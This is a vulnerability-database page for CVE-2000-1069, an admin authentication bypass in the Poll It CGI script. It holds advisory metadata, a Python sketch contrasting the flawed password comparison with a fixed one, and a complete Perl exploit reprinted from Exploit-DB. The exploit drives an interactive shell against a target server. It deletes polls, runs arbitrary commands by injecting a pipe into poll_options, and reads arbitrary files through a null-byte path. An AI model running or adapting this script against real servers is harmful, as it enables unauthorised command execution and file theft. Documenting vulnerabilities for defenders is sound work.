CVE-2000-1069
CVSS 6.4
Published: 2000-12-11 00:00:00
Last revised: 2016-10-17 22:08:21

[Original text] pollit.cgi in Poll It 2.01 and earlier allows remote attackers to access administrative functions without knowing the real password by specifying the same value to the entered_password and admin_password parameters.


[CNNVD] Poll It pollit.cgi access control vulnerability (CNNVD-200012-009)

        pollit.cgi in Poll It 2.01 and earlier contains a vulnerability. A remote attacker can access administrative functions without knowing the real password by setting the entered_password and admin_password parameters to the same value.
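As an added illustration (not Poll It's own code and not part of the CNNVD record), the comparison pattern the advisory describes beside a hardened check, written in Python rather than the CGI's Perl; only the parameter names entered_password and admin_password come from the advisory, the function names, the stored secret and the sample query strings are constructed:

```python
"""Why CVE-2000-1069 works: both sides of the password comparison are
taken from the request.  Constructed demo, not Poll It's code."""
import hashlib
import hmac
from urllib.parse import parse_qs

# Server-side secret.  Assumed to live in a config file readable only by
# the CGI process, never in a form field.  Constructed value for the demo.
SERVER_ADMIN_PASSWORD = "correct horse battery staple"


def vulnerable_admin_check(query_string: str) -> bool:
    """Pattern behind the advisory: admin_password was meant to be a
    server-filled hidden field, but it arrives in the same request as
    entered_password, so the client controls both operands.

    A request with neither parameter, or with admin_password= left empty
    (as the exploit on this page sends it), compares "" against "" and
    still passes.
    """
    params = parse_qs(query_string)
    entered = params.get("entered_password", [""])[0]
    admin = params.get("admin_password", [""])[0]
    return entered == admin


def fixed_admin_check(query_string: str,
                      stored_password: str = SERVER_ADMIN_PASSWORD) -> bool:
    """Hardened form: ignore any admin_password the client sends, compare
    entered_password only against the server-held secret, and compare
    fixed-length digests in constant time so the check leaks nothing
    through timing."""
    params = parse_qs(query_string)
    entered = params.get("entered_password", [""])[0]
    expected = hashlib.sha256(stored_password.encode()).digest()
    supplied = hashlib.sha256(entered.encode()).digest()
    return hmac.compare_digest(expected, supplied)


if __name__ == "__main__":
    # Constructed request shaped like the advisory's description.
    forged = "load=admin&entered_password=x&admin_password=x&action=delete_poll"
    print("vulnerable check:", vulnerable_admin_check(forged))  # True
    print("fixed check:     ", fixed_admin_check(forged))       # False
```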

- CVSS (base score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:cgi-world:poll_it_pro:1.6
cpe:/a:cgi-world:poll_it:2.0
cpe:/a:cgi-world:poll_it:2.01

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1069
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1069
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-009
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=97236719315352&w=2
(UNKNOWN)  BUGTRAQ  20001023 Re: Poll It v2.0 cgi (again)
http://xforce.iss.net/static/5419.php
(VENDOR_ADVISORY)  XF  pollit-admin-password-var

- Vulnerability information

Poll It pollit.cgi access control vulnerability
Medium severity  Unknown
2000-12-11 00:00:00 2005-05-02 00:00:00
Remote

- Advisories and patches


- Vulnerability information (177)

Poll It CGI v2.0 exploit (EDBID:177)
cgi webapps
2000-11-15 Verified
0 keelis
N/A
#!/usr/bin/perl

######################################
#                                    #
#                                    #
#      Poll It CGI v2.0 exploit      #
#       keelis/havoc korp 2000       #
#                                    #
#    shouts to modjo, p, zen, kd,    #
#     ab, all the script kiddies.    #
#                                    #
#                                    #
#     keelis(at)hushmail(dot)com     #
#                                    #
#                                    #
######################################

use Socket;

($host, $cgi_loc) = @ARGV[0,1];

$ip=inet_aton($host);

print("\n\t+---   Poll It CGI v2.0 exploit  ---+");
print("\n\t+---    keelis/havoc korp 2000   ---+\n\n\n");

usage() if (!defined($host) || !defined($cgi_loc));

while(true)
{
	print "[poll\@$host] ";

	$stdin = \*STDIN;
	$cmdin = <$stdin>;

	chomp($cmdin);
	($cmd, $param) = split(/ /, $cmdin, 2);
	
	if ($cmd eq "d")
	{
		$request = "?load=admin&admin_password=&action=delete_poll";
		$success_msg = "current poll has been deleted\n\n";
		make_request();
	}

	if ($cmd eq "e")
	{
		$request = "?load=admin&admin_password=&action=expire_poll";
		$success_msg = "current poll has been expired\n\n";
		make_request();
	}

	if ($cmd eq "c")
	{
		if (!defined($param))
		{
			print "you need to specify a voting topic for the new poll\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param";
		$success_msg = "created new poll with voting topic: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "a")
	{
		if (!defined($param))
		{
			print "you need to specify the text for the new voting option\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=$param";
		$success_msg = "voting option added to current poll: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "g")
	{
		if (!defined($param))
		{
			print "you need to specify the command to be run\n\n";
			next;
		}

		$request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C";
		$success_msg = "command has been run on remote server: \"$param\"\n\n";
		make_request();
	}

	if ($cmd eq "r")
	{
		if (!defined($param))
		{
			print "you need to specify the file to be read\n\n";
			next;
		}

		$request = "?load=admin&data_dir=$param%00";
		$success_msg = "contents of \"$param\" follow:\n\n";
		make_request();
	}

	if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help")
	{
		print "\n? \t\tshow this help screen\n";
		print "d \t\tdelete current poll\n";
		print "e \t\texpire current poll\n";
		print "c <param>\tcreate new poll using <param> as topic\n";
		print "a <param>\tadd <param> to voting options\n";
		print "r <param>\tread the file <param> in remote server\n";
		print "g <param>\trun <param> in the remote server\n";
		print "x \t\texit pollex.pl shell\n\n";
		next;
	}

	if ($cmd eq "x")
	{
		print "\n";
		last;
	}

	print "command not found. use \"?\" for help screen.\n\n";
}

sub make_request {
	$request=~s/ /+/g;
	$request=~s/\\/%5C/g;
	$request=~s/\//%2F/g;

	my @req=sendraw("GET $cgi_loc$request HTTP/1.1\r\nHost: $host\r\n\r\n");
	$reqanswer=join('', @req);

	($httpv, $httpcode) = split(/ /, $reqanswer);
	$httpcode = substr($httpcode, 0, 3);

	if ($httpcode eq "200") {
		print $success_msg if ($cmd ne "r");
	} else {
		if ($httpcode ne "404")
		{
			print "httpd returned an error code:\n\n";
			print $reqanswer,"\n";
		} else {
			die "unexpected httpd error code 404. aborting...\n\n"
		}
	}


	if ($cmd eq "r")
	{	$reqanswer=substr($reqanswer, index($reqanswer, "\r\n\r\n")+4);

		if (substr($reqanswer, 6, 15) eq "Template : File")
		{
			print "file \"$param\" not found or non-readable from cgi\n\n";
		} else {
			print $success_msg;
			print $reqanswer,"\n";
		}
	}

	next;
}

sub usage {
	print "Usage:  pollex.pl <host> <cgi_loc>\n\n";
	print "\thost   :\thost/ip where CGI resides\n";
	print "\tcgi_loc:\tpath to the CGI (non-SSI version needed)\n\n";
	exit(0);
}

sub sendraw {
        my ($pstr)=@_;

        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("socket problems... aborting.\n");

        if(connect(S,pack "SnA4x8",2,80,$ip)){
                select(S);
                $|=1;
                print $pstr;
                my @in=<S>; 
                select(STDOUT);
	        close(S); 
                return @in;
        } else {
		die("can\'t connect... aborting.\n");
	}
}

# milw0rm.com [2000-11-15]

- Vulnerability information

6985
Poll It pollit.cgi Administration Authentication Bypass
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2001-01-22 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete